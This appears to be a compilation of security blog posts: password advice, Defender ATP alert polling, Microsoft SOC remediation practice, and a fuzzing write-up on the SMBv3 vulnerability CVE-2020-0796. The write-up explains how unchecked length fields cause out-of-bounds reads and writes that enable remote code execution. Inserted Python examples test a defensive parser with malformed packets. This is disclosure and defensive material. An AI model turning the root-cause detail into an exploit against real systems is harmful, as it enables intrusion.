Learning how to navigate our entire lives online has definitely been a steep learning curve for many of us over the last few weeks. Whether it’s working from home, helping our kids learn from home, conducting ‘wine time’ from home or even doing our Zumba classes from home – it’s essential now more than ever that we are doing this safely. And one of the most powerful yet simple ways we can ‘sure-up’ our online safety is by being smart with our passwords.

World Password Day – Take A Minute To Check Your Approach

Today is World Password Day – the perfect opportunity to ensure we are doing all we can to manage our online logins. It’s quite unsettling to think that one of the easiest ways for cybercriminals to get their hands on the sensitive information we store in our online accounts is through our passwords.

Passwords act like a key to our digital identity. Not only do they allow us to bank, shop, work, learn, date and socialise online but they also protect us as well. Strong, complex passwords ensure all the information we store online (aka our digital assets) are protected which is essential for our privacy and financial and personal security.

So, let’s use this annual event to make sure we are doing all we can to lock down our precious online data by managing our passwords properly.

Same Password For Every Account? – Rookie Error

If I had to count up all my online accounts on my fingers and toes, I would quickly run out of body parts! With so many logins to remember, many of us end up using the same password for every account. And while that might seem so practical, it in fact makes us very vulnerable. Just think about this scenario: if you become the victim of an online scam and the password to one of your online accounts is stolen, then a cybercriminal can use this same password to access all your online accounts.

So, before you know it, a cybercriminal can access your emails, bank accounts, online shopping accounts – that may have stored credit cards, private photo and video files.

What You Can Do TODAY to Ensure your Password Habits are Keeping you Safe

Yes, we are all human which means we are going to take shortcuts. I get it! I love shortcuts – I’m a fan of using pasta sauce from the jar! But if there’s one area where shortcuts should NOT be used it’s with passwords. So, here are my top suggestions on how you can stop your private online data falling into the wrong hands and block cybercriminals at the very first point of entry.

  1. Commit to NOT Using Common Passwords

If your password is ‘123456’ then you need to change it now. The UK’s National Cyber Safety Centre showed in a survey last year that this is the most commonly used password. In fact, in the eight years since I’ve been doing this job, this password has annually topped surveys.

Passwords are the gateway to our digital lives. To avoid giving the wrong people access to your accounts, make sure you create strong and unique passwords. This means including numbers, lowercase and uppercase letters and symbols. The more complex your password, the more difficult it is to crack. Why not create a nonsensical phrase or sentence? And always avoid using simple personal details within your password altogether. Your date of birth, middle name or pet names are things cybercriminals can trace through your social media accounts.

  2. Same Password For Every Account? Think Again

The idea of having one password across all online accounts is alluring because let’s admit it…we’ve all been locked out of an account after failing to remember the password! While having one password to remember for all accounts seems to make life easier, it increases the risk of your vital online data being compromised at once across different accounts. So, ensure that your logins are unique for every account to avoid having all your accounts becoming vulnerable in case you are hacked.

  3. ALWAYS Select Multi-Factor Authentication

Wherever possible, embrace multifactor authentication (MFA) for online accounts. MFA is a security system that requires more than one way of identification before gaining access to an account. Most commonly, it involves a security code sent to your smartphone, security questions or even a fingerprint, on top of the password. An extra layer of defence to stop sham access to vital online data? Yes please!

  4. Give Your Passwords a Health Check

What better way to check the health of your passwords than to see whether they’ve been compromised in a data breach. The website www.haveibeenpwned.com.au is an effective way to check whether a cybercriminal has discovered your passwords. If yes, give your passwords an overhaul and change them wherever they are used to safeguard your data.

  5. Employ A Password Manager

If you are currently feeling a tad overwhelmed at the thought of creating and managing unique passwords for your multiple online accounts, do not stress – I have a solution – a password manager. This marvellous software program will create random and complex passwords for each of your accounts and store them securely, which means you don’t need to! All you need to do is remember the master password!! When choosing a password manager, ensure it uses multi-factor authentication to identify you, e.g. facial recognition, fingerprint and a password.

If you have a spare 30 minutes today then please take the time to give your password habits an overhaul. I know we are all so flat out juggling work and kids at the moment but a careless approach to password security is no different to a careless approach to home security. So, get your passwords working for you so you can continue living your life online – especially Friday night ‘virtual drinks’!!



The post World Password Day 2020 appeared first on McAfee Blogs.

How to gain 24/7 detection and response coverage with Microsoft Defender ATP

This blog post is part of the Microsoft Intelligence Security Association guest blog series. To learn more about MISA, go here.

Whether you’re a security team of one or a dozen, detecting and stopping threats around the clock is a challenge. Security incidents don’t happen exclusively during business hours: attackers often wait until the late hours of the night to breach an environment.

At Red Canary, we work with security teams of all shapes and sizes to improve detection and response capabilities. Our Security Operations Team investigates threats in customer environments 24/7/365, removes false positives, and delivers confirmed threats with context. We’ve seen teams run into a wide range of issues when trying to establish after-hours coverage on their own, including:

  • For global enterprises, around-the-clock monitoring can significantly increase the pressure on a U.S.–based security team. If you have personnel around the world, a security team in a single time zone isn’t sufficient to cover the times that computing assets are used in those environments.
  • In smaller companies that don’t have global operations, the security team is more likely to be understaffed and unable to handle 24/7 security monitoring without stressful on-call schedules.
  • For the security teams of one, being “out of office” is a foreign concept. You’re always on. And you need to set up some way to monitor the enterprise while you’re away.

Microsoft Defender Advanced Threat Protection (ATP) is an industry-leading endpoint security solution that’s built into Windows, with extended capabilities for Mac and Linux servers. Red Canary unlocks the telemetry delivered from Microsoft Defender ATP and investigates every alert, enabling you to immediately increase your detection coverage and waste no time on false positives.

Here’s how those who haven’t started with Red Canary yet can answer the question, “How can I support my 24/7 security needs with Microsoft Defender ATP?”

No matter how big your security team is, the most important first step is notifying the right people based on an on-call schedule. In this post, we’ll describe two different ways of getting Microsoft Defender ATP alerts to your team 24×7 and how Red Canary has implemented this for our customers.

Basic 24/7 via email

Microsoft Defender Security Center allows you to send all Microsoft Defender ATP alerts to an email address. You can set up email alerts under Settings → Alert notifications.


Email notification settings in Microsoft Defender Security Center.

These emails will be sent to your team and should be monitored for high severity situations after-hours.

If sent to a ticketing system, these emails can trigger tickets or after-hours pages to be created for your security team. We recommend limiting the alerts to medium and high severity so that you won’t be bothered for informational or low alerts.

Figure: Setting up alert emails in Microsoft Defender ATP to be sent to a ticketing system.

Now any future alerts will create a new ticket in your ticketing system, where you can assign security team members to on-call rotations and notify on-call personnel of new alerts (if supported). Once the notification is received by on-call personnel, they would then log into Microsoft Defender’s Security Center for further investigation and triage.

Enhanced 24/7 via APIs

What if you want to ingest alerts to a system that doesn’t use email? You can do this by using the Microsoft Defender ATP APIs. First, you’ll need to have an authentication token. You can get the token like we do here:

Figure: API call to retrieve authentication token.

Once you’ve stored the authentication token you can use it to poll the Microsoft Defender ATP API and retrieve alerts from Microsoft Defender ATP. Here’s an example of the code to pull new alerts.

Figure: API call to retrieve alerts from Microsoft Defender ATP.

The API only returns a subset of the data associated with each alert. Here’s an example of what you might receive.

Figure: Example of a Microsoft Defender ATP alert returned from the API.

You can then take this data and ingest it into any of your internal tools. You can learn more about how to access Microsoft Defender ATP APIs in the documentation. Please note, the limited information included in an alert email or API response is not enough to triage the behavior. You will still need to log into the Microsoft Defender Security Center to find out what happened and take appropriate action.
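As an added example (not Red Canary’s or Microsoft’s code), here is a small Python poller that does what the screenshots above outline: obtain a token with the OAuth2 client-credentials flow, list alerts created after a timestamp using the API’s OData $filter, keep only unresolved medium and high alerts that have not been paged on before, and reduce each to the fields a ticketing system needs. The tenant, client ID and secret are placeholders, and SAMPLE_RESPONSE is a constructed reply so the filtering can be run offline; the endpoint URLs, filter syntax and alert field names follow the public Microsoft Defender ATP API documentation.

```python
"""Poll Microsoft Defender ATP alerts and hand them to an on-call ticketing flow.

Added example; not Red Canary's or Microsoft's code. Endpoints and the OData
$filter follow the public Defender ATP API documentation. TENANT_ID, CLIENT_ID
and CLIENT_SECRET are placeholders; SAMPLE_RESPONSE is a constructed reply.
"""
import json
import urllib.parse
import urllib.request
from datetime import datetime, timedelta, timezone

TENANT_ID = "<tenant-id-placeholder>"
CLIENT_ID = "<app-client-id-placeholder>"
CLIENT_SECRET = "<client-secret-placeholder>"

TOKEN_URL = f"https://login.microsoftonline.com/{TENANT_ID}/oauth2/v2.0/token"
API_BASE = "https://api.securitycenter.microsoft.com/api"
SCOPE = "https://api.securitycenter.microsoft.com/.default"

# Defender ATP severity strings, ranked so a floor can be applied.
SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}


def get_token() -> str:
    """OAuth2 client-credentials flow; returns a bearer token for the API."""
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "scope": SCOPE,
    }).encode()
    with urllib.request.urlopen(TOKEN_URL, data=body) as resp:
        return json.load(resp)["access_token"]


def since_iso(hours_back: int) -> str:
    """UTC timestamp `hours_back` hours ago, in the format the $filter expects."""
    t = datetime.now(timezone.utc) - timedelta(hours=hours_back)
    return t.strftime("%Y-%m-%dT%H:%M:%SZ")


def build_alerts_url(since: str) -> str:
    """List-alerts URL restricted to alerts created after `since` (OData $filter)."""
    flt = urllib.parse.quote(f"alertCreationTime gt {since}", safe="")
    return f"{API_BASE}/alerts?$filter={flt}"


def alerts_from_response(body: str) -> list:
    """The API wraps results in an OData 'value' array."""
    return json.loads(body).get("value", [])


def fetch_alerts(token: str, url: str) -> list:
    """GET one page of alerts with the bearer token."""
    req = urllib.request.Request(url, headers={
        "Authorization": f"Bearer {token}",
        "Accept": "application/json",
    })
    with urllib.request.urlopen(req) as resp:
        return alerts_from_response(resp.read().decode())


def select_actionable(alerts, min_severity="Medium", seen=()):
    """Alerts worth paging on: at/above the severity floor, unresolved, not seen before."""
    floor = SEVERITY_RANK[min_severity]
    return [a for a in alerts
            if SEVERITY_RANK.get(a.get("severity"), -1) >= floor
            and a.get("status") != "Resolved"
            and a.get("id") not in seen]


def to_ticket(alert: dict) -> dict:
    """Fields an on-call ticket needs; full triage still happens in Security Center."""
    return {
        "key": alert["id"],
        "summary": f"[{alert['severity']}] {alert['title']}",
        "host": alert.get("computerDnsName") or alert.get("machineId"),
        "category": alert.get("category"),
        "created": alert.get("alertCreationTime"),
    }


# Constructed sample reply; shape follows the documented alert resource.
SAMPLE_RESPONSE = json.dumps({"value": [
    {"id": "example-alert-0001", "title": "Suspicious PowerShell command line",
     "severity": "High", "status": "New", "category": "Execution",
     "computerDnsName": "ws-example-01.corp.example", "alertCreationTime": "2020-05-02T03:14:07Z"},
    {"id": "example-alert-0002", "title": "Credential dumping tool observed",
     "severity": "Medium", "status": "InProgress", "category": "CredentialAccess",
     "computerDnsName": "ws-example-07.corp.example", "alertCreationTime": "2020-05-02T03:20:41Z"},
    {"id": "example-alert-0003", "title": "Unusual network sign-in",
     "severity": "Low", "status": "New", "category": "InitialAccess",
     "computerDnsName": "ws-example-02.corp.example", "alertCreationTime": "2020-05-02T03:22:00Z"},
    {"id": "example-alert-0004", "title": "Malware detected and remediated",
     "severity": "High", "status": "Resolved", "category": "Malware",
     "computerDnsName": "ws-example-03.corp.example", "alertCreationTime": "2020-05-02T03:25:19Z"},
]})


def poll_once(seen=(), body=None):
    """One polling pass: returns tickets to open. `body` replaces the live call for offline use."""
    if body is None:
        alerts = fetch_alerts(get_token(), build_alerts_url(since_iso(1)))
    else:
        alerts = alerts_from_response(body)
    return [to_ticket(a) for a in select_actionable(alerts, seen=seen)]


if __name__ == "__main__":
    for ticket in poll_once(body=SAMPLE_RESPONSE):
        print(ticket)
```

Run it on a schedule and persist the seen set between runs so each alert pages once; as the post notes, the ticket only carries enough to route the page, and the investigation itself still happens in the Security Center.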

24/7 with Red Canary

By enabling Red Canary, you supercharge your Microsoft Defender ATP deployment by adding a proven 24×7 security operations team who are masters at finding and stopping threats, and an automation platform to quickly remediate and get back to business.

Red Canary continuously ingests all of the raw telemetry generated from your instance of Microsoft Defender ATP as the foundation for our service. We also ingest and monitor Microsoft Defender ATP alerts. We then apply thousands of our own proprietary analytics to identify potential threats that are sent 24/7 to a Red Canary detection engineer for review.

Here’s an overview of the process (to go behind the scenes of these operations check out our detection engineering blog series):

Figure: Managed detection and response with Red Canary.

Red Canary is monitoring your Microsoft Defender ATP telemetry and alerts. If anything is a confirmed threat, our team creates a detection and sends it to you using a built-in automation framework that supports email, SMS, phone, Microsoft Teams/Slack, and more. Below is an example of what one of those detections might look like.

Figure: Red Canary confirms threats and prioritizes them so you know what to focus on.

At the top of the detection timeline you’ll receive a short description of what happened. The threat has already been examined by a team of detection engineers from Red Canary’s Cyber Incident Response Team (CIRT), so you don’t have to worry about triage or investigation. As you scroll down, you can quickly see the results of the investigation that Red Canary’s senior detection engineers have done on your behalf, including detailed notes that provide context to what’s happening in your environment:

Figure: Notes from Red Canary senior detection engineers (in light blue) provide valuable context.

You’re only notified of true threats and not false positives. This means you can focus on responding rather than digging through data to figure out what happened.

What if you don’t want to be woken up, you’re truly unavailable, or you just want bad stuff immediately dealt with? Use Red Canary’s automation to handle remediation on the fly. You and your team can create playbooks in your Red Canary portal to respond to threats immediately, even if you’re unavailable.

Figure: Red Canary automation playbook.

This playbook allows you to isolate the endpoint (using the Machine Action resource type in the Microsoft Defender ATP APIs) if Red Canary identifies suspicious activity. You also have the option to set up Automate playbooks that depend on an hourly schedule. For example, you may want to approve endpoint isolation during normal work hours, but use automatic isolation overnight:

Figure: Red Canary Automate playbook to automatically remediate a detection.

Getting started with Red Canary

Whether you’ve been using Microsoft Defender ATP since its preview releases or you’re just getting started, Red Canary is the fastest way to accelerate your security operations program. Immediate onboarding, increased detection coverage, and a 24/7 CIRT team are all at your fingertips.

Terence Jackson, CISO at Thycotic and Microsoft Defender ATP user, describes what it’s like working with Red Canary:

“I have a small team that has to protect a pretty large footprint. I know the importance of detecting, preventing, and stopping problems at the entry point, which is typically the endpoint. We have our corporate users but then we also have SaaS customers we have to protect. Currently my team tackles both, so for me it’s simply having a trusted partner that can take the day-to-day hunting/triage/elimination of false positives and only provide actionable alerts/intel, which frees my team up to do other critical stuff.”

Red Canary is the fastest way to enhance your detection coverage from Microsoft Defender ATP so you know exactly when and where to respond.

Contact us to see a demo and learn more.

The post How to gain 24/7 detection and response coverage with Microsoft Defender ATP appeared first on Microsoft Security.

Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2

This is the sixth blog in the Lessons learned from the Microsoft SOC series designed to share our approach and experience from the front lines of our security operations center (SOC) protecting Microsoft and our Detection and Response Team (DART) helping our customers with their incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

COVID-19 and the SOC

Before we conclude the day in the life, we thought we would share an analyst’s eye view of the impact of COVID-19. Our analysts are mostly working from home now and our cloud-based tooling approach enabled this transition to go pretty smoothly. The differences in attacks we have seen are mostly in the early stages of an attack, with phishing lures designed to exploit emotions related to the current pandemic and increased focus on home firewalls and routers (using techniques like RDP brute-forcing attempts and DNS poisoning—more here). The attack techniques they attempt to employ after that are fairly consistent with what they were doing before.

A day in the life—remediation

When we last left our heroes in the previous entry, our analyst had built a timeline of the potential adversary attack operation. Of course, knowing what happened doesn’t actually stop the adversary or reduce organizational risk, so let’s remediate this attack!

  1. Decide and act—As the analyst develops a high enough level of confidence that they understand the story and scope of the attack, they quickly shift to planning and executing cleanup actions. While this appears as a separate step in this particular description, our analysts often execute on cleanup operations as they find them.

Big Bang or clean as you go?

Depending on the nature and scope of the attack, analysts may clean up attacker artifacts as they go (emails, hosts, identities) or they may build a list of compromised resources to clean up all at once (Big Bang).

  • Clean as you go—For most typical incidents that are detected early in the attack operation, analysts quickly clean up the artifacts as we find them. This rapidly puts the adversary at a disadvantage and prevents them from moving forward with the next stage of their attack.
  • Prepare for a Big Bang—This approach is appropriate for a scenario where an adversary has already “settled in” and established redundant access mechanisms to the environment (frequently seen in incidents investigated by our Detection and Response Team (DART) at customers). In this case, analysts should avoid tipping off the adversary until all attacker presence has been discovered, as surprise can help with fully disrupting their operation. We have learned that partial remediation often tips off an adversary, which gives them a chance to react and rapidly make the incident worse (spread further, change access methods to evade detection, inflict damage/destruction for revenge, cover their tracks, etc.). Note that cleaning up phishing and malicious emails can often be done without tipping off the adversary, but cleaning up host malware and reclaiming control of accounts has a high chance of tipping off the adversary.

These are not easy decisions to make and we have found no substitute for experience in making these judgement calls. The collaborative work environment and culture we have built in our SOC helps immensely, as our analysts can tap into each other’s experience to help make these tough calls.

The specific response steps are very dependent on the nature of the attack, but the most common procedures used by our analysts include:

  • Client endpoints—SOC analysts can isolate a computer and contact the user directly (or IT operations/helpdesk) to have them initiate a reinstallation procedure.
  • Server or applications—SOC analysts typically work with IT operations and/or application owners to arrange rapid remediation of these resources.
  • User accounts—We typically reclaim control of these by disabling the account and resetting the password for compromised accounts (though these procedures are evolving as a large proportion of our users are now passwordless, using Windows Hello or another form of MFA). Our analysts also explicitly expire all authentication tokens for the user with Microsoft Cloud App Security.
    Analysts also review the multi-factor phone number and device enrollment to ensure it hasn’t been hijacked (often contacting the user), and reset this information as needed.
  • Service Accounts—Because of the high risk of service/business impact, SOC analysts work with the service account owner of record (falling back on IT operations as needed) to arrange rapid remediation of these resources.
  • Emails—The attack/phishing emails are deleted (and sometimes purged to prevent recovery of deleted emails), but we always save a copy of the original email in the case notes for later search and analysis (headers, content, scripts/attachments, etc.).
  • Other—Custom actions can also be executed based on the nature of the attack such as revoking application tokens, reconfiguring servers and services, and more.

Automation and integration for the win

It’s hard to overstate the value of integrated tools and process automation, as these bring so many benefits—improving the analysts’ daily experience and improving the SOC’s ability to reduce organizational risk.

  • Analysts spend less time on each incident, reducing the attacker’s time to operation—measured by mean time to remediate (MTTR).
  • Analysts aren’t bogged down in manual administrative tasks so they can react quickly to new detections (reducing mean time to acknowledge—MTTA).
  • Analysts have more time to engage in proactive activities that both reduce organization risk and increase morale by keeping them focused on the mission.

Our SOC has a long history of developing our own automation and scripts, built by a dedicated automation team in our SOC, to make analysts’ lives easier. Because custom automation requires ongoing maintenance and support, we are constantly looking for ways to shift automation and integration to capabilities provided by Microsoft engineering teams (which also benefits our customers). While still early in this journey, this approach typically improves the analyst experience and reduces maintenance effort and challenges.

This is a complex topic that could fill many blogs, but this takes two main forms:

  • Integrated toolsets save analysts manual effort during incidents by allowing them to easily navigate multiple tools and datasets. Our SOC relies heavily on the integration of Microsoft Threat Protection (MTP) tools for this experience, which also saves the automation team from writing and supporting custom integration for this.
  • Automation and orchestration capabilities reduce manual analyst work by automating repetitive tasks and orchestrating actions between different tools. Our SOC currently relies on an advanced custom SOAR platform and is actively working with our engineering teams (MTP’s AutoIR capability and Azure Sentinel SOAR) on how to shift our learnings and workload onto those capabilities.

After the attacker operation has been fully disrupted, the analyst marks the case as remediated, which is the timestamp signaling the end of MTTR measurement (which started when the analyst began the active investigation in step 2 of the previous blog).

While having a security incident is bad, having the same incident repeated multiple times is much worse.

  1. Post-incident cleanup—Because lessons aren’t actually “learned” unless they change future actions, our analysts always integrate any useful information learned from the investigation back into our systems. Analysts capture these learnings so that we avoid repeating manual work in the future and can rapidly see connections between past and future incidents by the same threat actors. This can take a number of forms, but common procedures include:
    • Indicators of Compromise (IoCs)—Our analysts record any applicable IoCs such as file hashes, malicious IP addresses, and email attributes into our threat intelligence systems so that our SOC (and all customers) can benefit from these learnings.
    • Unknown or unpatched vulnerabilities—Our analysts can initiate processes to ensure that missing security patches are applied, misconfigurations are corrected, and vendors (including Microsoft) are informed of “zero day” vulnerabilities so that they can create security patches for them.
    • Internal actions such as enabling logging on assets and adding or changing security controls.

Continuous improvement

So the adversary has now been kicked out of the environment and their current operation poses no further risk. Is this the end? Will they retire and open a cupcake bakery or auto repair shop? Not likely after just one failure, but we can consistently disrupt their successes by increasing the cost of attack and reducing the return, which will deter more and more attacks over time. For now, we must assume that adversaries will try to learn from what happened on this attack and try again with fresh ideas and tools.

Because of this, our analysts also focus on learning from each incident to improve their skills, processes, and tooling. This continuous improvement occurs through many informal and formal processes ranging from formal case reviews to casual conversations where they tell the stories of incidents and interesting observations.

As caseload allows, the investigation team also hunts proactively for adversaries when they are not on shift, which helps them stay sharp and grow their skills.

This closes our virtual shift visit for the investigation team. Join us next time as we shift to our Threat hunting team (a.k.a. Tier 3) and get some hard-won advice and lessons learned.

…until then, share and enjoy!

P.S. If you are looking for more information on the SOC and other cybersecurity topics, check out previous entries in the series (Part 1 | Part 2a | Part 2b | Part 3a | Part 3b), Mark’s List (https://aka.ms/markslist), and our new security documentation site—https://aka.ms/securitydocs. Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Mark on LinkedIn or Twitter.

The post Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2 appeared first on Microsoft Security.

Mitigating vulnerabilities in endpoint network stacks

The skyrocketing demand for tools that enable real-time collaboration, remote desktops for accessing company information, and other services that enable remote work underlines the tremendous importance of building and shipping secure products and services. While this is magnified as organizations are forced to adapt to the new environment created by the global crisis, it’s not a new imperative. Microsoft has been investing heavily in security, and over the years our commitment to building proactive security into products and services has only intensified.

To help deliver on this commitment, we continuously find ways to improve and secure Microsoft products. One aspect of our proactive security work is finding vulnerabilities and fixing them before they can be exploited. Our strategy is to take a holistic approach and drive security throughout the engineering lifecycle. We do this by:

  • Building security early into the design of features.
  • Developing tools and processes that proactively find vulnerabilities in code.
  • Introducing mitigations into Windows that make bugs significantly harder to exploit.
  • Having our world-class penetration testing team test the security boundaries of the product so we can fix issues before they can impact customers.

This proactive work ensures we are continuously making Windows safer and finding as many issues as possible before attackers can take advantage of them. In this blog post we will discuss a recent vulnerability that we proactively found and fixed and provide details on tools and techniques we used, including a new set of tools that we built internally at Microsoft. Our penetration testing team is constantly testing the security boundaries of the product to make it more secure, and we are always developing tools that help them scale and be more effective based on the evolving threat landscape. Our investment in fuzzing is the cornerstone of our work, and we are constantly innovating this tech to keep on breaking new ground.

Proactive security to prevent the next WannaCry

In the past few years, much of our team’s efforts have been focused on uncovering remote network vulnerabilities and preventing events like the WannaCry and NotPetya outbreaks. Some bugs we have recently found and fixed include critical vulnerabilities that could be leveraged to exploit common secure remote communication tools like RDP or create ransomware issues like WannaCry: CVE-2019-1181 and CVE-2019-1182 dubbed “DejaBlue“, CVE-2019-1226 (RCE in RDP Server), CVE-2020-0611 (RCE in RDP Client), and CVE-2019-0787 (RCE in RDP client), among others.

One of the biggest challenges we regularly face in these efforts is the sheer volume of code we analyze. Windows is enormous and continuously evolving: 5.7 million source code files, with more than 3,500 developers doing 1,100 pull requests per day in 440 official branches. This rapid cadence and evolution allows us to add new features as well as proactively drive security into Windows.

Like many security teams, we frequently turn to fuzzing to help us quickly explore and assess large codebases. Innovations we’ve made in our fuzzing technology have made it possible to get deeper coverage than ever before, resulting in the discovery of new bugs, faster. One such vulnerability is the remote code execution (RCE) vulnerability in Microsoft Server Message Block version 3 (SMBv3) tracked as CVE-2020-0796 and fixed on March 12, 2020.

In the following sections, we will share the tools and techniques we used to fuzz SMB, the root cause of the RCE vulnerability, and relevant mitigations to exploitation.

Fully deterministic person-in-the-middle fuzzing

We use a custom deterministic full system emulator tool we call “TKO” to fuzz and introspect Windows components. TKO provides the capability to perform full system emulation and memory snapshotting, as well as other innovations. As a result of its unique design, TKO provides several unique benefits to SMB network fuzzing:

  • The ability to snapshot and fuzz forward from any program state.
  • Efficiently restoring to the initial state for fast iteration.
  • Collecting complete code coverage across all processes.
  • Leveraging greater introspection into the system without too much perturbation.

While all of these actions are possible using other tools, our ability to seamlessly leverage them across both user and kernel mode drastically reduces the spin-up time for targets. To learn more, check out David Weston’s recent BlueHat IL presentation “Keeping Windows secure”, which touches on fuzzing, as well as the TKO tool and infrastructure.

Fuzzing SMB

Given the ubiquity of SMB and the impact demonstrated by SMB bugs in the past, assessing this network transfer protocol has been a priority for our team. While there have been past audits and fuzzers thrown against the SMB codebase, some of which postdate the current SMB version, TKO’s new capabilities and functionalities made it worthwhile to revisit the codebase. Additionally, even though the SMB version number has remained static, the code has not! These factors played into our decision to assess the SMB client/server stack.

After performing an initial audit pass of the code to understand its structure and dataflow, as well as to get a grasp of the size of the protocol’s state space, we had the information we needed to start fuzzing.

We used TKO to set up a fully deterministic feedback-based fuzzer with a combination of generated and mutated SMB protocol traffic. Our goal for generating or mutating across multiple packets was to dig deeper into the protocol’s state machine. Normally this would introduce difficulties in reproducing any issues found; however, our use of emulators made this a non-issue. New generated or mutated inputs that triggered new coverage were saved to the input corpus. Our team had a number of basic mutator libraries for different scenarios, but we needed to implement a generator. Additionally, we enabled some of the traditional Windows heap instrumentation using verifier, turning on page heap for SMB-related drivers.

We began work on the SMBv2 protocol generator and took a network capture of an SMB negotiation with the aim of replaying these packets with mutations against a Windows 10, version 1903 client. We added a mutator with basic mutations (e.g., bit flips, insertions, deletions, etc.) to our fuzzer and kicked off an initial run while we continued to improve and develop further.

Figure 1. TKO fuzzing workflow

A short time later, we came back to some compelling results. Replaying the first crashing input with TKO’s kdnet plugin revealed the following stack trace:

> tkofuzz.exe repro inputs\crash_6a492.txt -- kdnet:conn 127.0.0.1:50002

Figure 2. Windbg stack trace of crash

We found an access violation in srv2!Smb2CompressionDecompress.

Finding the root cause of the crash

While the stack trace suggested that a vulnerability exists in the decompression routine, it’s the parsing of length counters and offsets from the network that causes the crash. The last packet in the transaction needed to trigger the crash has ‘\xfcSMB’ set as the first bytes in its header, making it a COMPRESSION_TRANSFORM packet.

Figure 3. COMPRESSION_TRANSFORM packet details

The SMBv2 COMPRESSION_TRANSFORM packet starts with a COMPRESSION_TRANSFORM_HEADER, which defines where in the packet the compressed bytes begin and the length of the compressed buffer.

typedef struct _COMPRESSION_TRANSFORM_HEADER
{
    UCHAR  Protocol[4];          // Contains 0xFC, 'S', 'M', 'B'
    ULONG  OriginalMessageSize;  // Size of the data once decompressed
    USHORT AlgorithmId;          // Compression algorithm used for the payload
    USHORT Flags;
    ULONG  Length;               // Added to the buffer pointer to locate the compressed bytes
} COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;

In srv2!Srv2DecompressData, shown in the graph below, we can find this COMPRESSION_TRANSFORM_HEADER struct being parsed out of the network packet and used to determine the pointers passed to srv2!SMBCompressionDecompress.

Figure 4. Srv2DecompressData graph

We can see that at 0x7e94, rax points to our network buffer, and the buffer is copied to the stack before the OriginalCompressedSegmentSize and Length are parsed out and added together at 0x7ED7 to determine the size of the resulting decompressed bytes buffer. Overflowing this value causes the decompression to write its results out of the bounds of the destination SrvNet buffer, in an out-of-bounds write (OOBW).

Figure 5. Overflow condition

Looking further, we can see that the Length field is parsed into esi at 0x7F04, added to the network buffer pointer, and passed to CompressionDecompress as the source pointer. As Length is never checked against the actual number of received bytes, it can cause decompression to read off the end of the received network buffer. Setting this Length to be greater than the packet length also causes the computed source buffer length passed to SmbCompressionDecompress to underflow at 0x7F18, creating an out-of-bounds read (OOBR) vulnerability. Combining this OOBR vulnerability with the previous OOBW vulnerability creates the necessary conditions to leak addresses and create a complete remote code execution exploit.

Figure 6. Underflow condition
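The two conditions described above can be stated as checks a parser must make before handing anything to the decompressor. The following Python is an added example, not Microsoft’s srv2 code: it parses the header shown earlier using the field names from that struct, rejects a Length that runs past the received bytes (the underflow that produced the out-of-bounds read) and a 32-bit wrap of OriginalMessageSize + Length (the overflow that produced the out-of-bounds write), and shows what an unchecked 32-bit add would have yielded. The packets it is tested with are constructed, and no decompression is performed.

```python
"""Bounds-checked parsing of an SMBv2 COMPRESSION_TRANSFORM packet.

Added example; not Microsoft's srv2 code. Field names and sizes follow the
COMPRESSION_TRANSFORM_HEADER shown in the post. The checks encode the two
conditions the post describes: Length must fit inside the received bytes,
and OriginalMessageSize + Length must not wrap at 32 bits.
"""
import struct

# Protocol[4], OriginalMessageSize, AlgorithmId, Flags, Length (little-endian)
HEADER_FMT = "<4sIHHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 16 bytes on the wire
PROTOCOL_ID = b"\xfcSMB"
U32_MAX = 0xFFFFFFFF


class TransformError(ValueError):
    """Raised with a short code naming the check that failed."""


def wrapped_output_size(original_size: int, length: int) -> int:
    """The truncated size an unchecked 32-bit addition yields (for illustration)."""
    return (original_size + length) & U32_MAX


def parse_compression_transform(packet: bytes) -> dict:
    """Validate the header and split the packet into prefix and compressed source."""
    if len(packet) < HEADER_LEN:
        raise TransformError("short-header")
    proto, original_size, algorithm, flags, length = struct.unpack_from(HEADER_FMT, packet)
    if proto != PROTOCOL_ID:
        raise TransformError("bad-protocol-id")
    payload_len = len(packet) - HEADER_LEN
    # Length is applied as an offset into the payload. Past the end, the remaining
    # source length (payload_len - length) would go negative and, as an unsigned
    # value, let the decompressor read beyond the received buffer.
    if length > payload_len:
        raise TransformError("length-exceeds-packet")
    # The destination buffer is sized as OriginalMessageSize + Length; refuse a
    # value that does not fit in 32 bits instead of silently truncating it.
    if original_size + length > U32_MAX:
        raise TransformError("output-size-overflow")
    return {
        "algorithm": algorithm,
        "flags": flags,
        "output_size": original_size + length,
        "prefix": packet[HEADER_LEN:HEADER_LEN + length],   # uncompressed bytes copied verbatim
        "compressed": packet[HEADER_LEN + length:],        # source handed to the decompressor
    }


def check_transform(packet: bytes):
    """None when the packet passes every check, else the failing check's code."""
    try:
        parse_compression_transform(packet)
    except TransformError as err:
        return str(err)
    return None


def build_transform(original_size, algorithm, flags, length, payload: bytes) -> bytes:
    """Assemble a packet from its fields (test helper; inputs are constructed)."""
    return struct.pack(HEADER_FMT, PROTOCOL_ID, original_size, algorithm, flags, length) + payload


if __name__ == "__main__":
    ok = build_transform(100, 1, 0, 4, b"\x01\x02\x03\x04" + b"\xaa" * 8)
    print(check_transform(ok), parse_compression_transform(ok)["output_size"])
    print(check_transform(build_transform(100, 1, 0, 0x100, b"\xaa" * 8)))
    print(check_transform(build_transform(0xFFFFFFF0, 1, 0, 0x20, b"\xaa" * 0x28)))
    print(hex(wrapped_output_size(0xFFFFFFF0, 0x20)))
```

The order of the checks matters: the Length-versus-packet check has to come first, because every later computation (source length, prefix slice, output size) uses Length as a trusted offset.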

Windows 10 mitigations against remote network vulnerabilities

Our discovery of the SMBv3 vulnerability highlights the importance of revisiting protocol stacks regularly as our tools and techniques continue to improve over time. In addition to the proactive hunting for these types of issues, the investments we made in the last several years to harden Windows 10 through mitigations like address space layout randomization (ASLR), Control Flow Guard (CFG), InitAll, and hypervisor-enforced code integrity (HVCI) hinder trivial exploitation and buy defenders time to patch and protect their networks.

